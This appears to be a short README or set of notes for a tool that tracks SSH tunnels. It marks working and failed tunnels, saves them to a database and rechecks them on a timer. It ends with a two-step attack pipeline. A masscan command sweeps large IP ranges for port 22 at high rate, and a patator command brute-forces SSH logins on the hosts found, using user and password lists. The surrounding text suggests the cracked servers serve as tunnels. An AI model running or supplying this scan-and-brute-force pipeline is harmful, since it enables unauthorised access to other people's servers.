Working Tunnel start with `S`

Non-working Tunnel start with `F`

The process sometime will delay to stop when process killed. The reason is the process is waiting for IO task finish first...

When start the command:
1. Save all tunnel info to database
2. Check the status of tunnel every X minutes and update status to database
3. Refresh the table everytime start command




masscan -p22 -iL iprange.txt --rate 200000 | awk '{print $6;}' > iplist.txt

patator ssh_login host=FILE0 user=FILE1 password=FILE2 0=iplist.txt 1=user.txt 2=password.txt -x ignore:mesg='Authentication failed.' -x free=host:code=0 --max-retries 0 -l /root/log/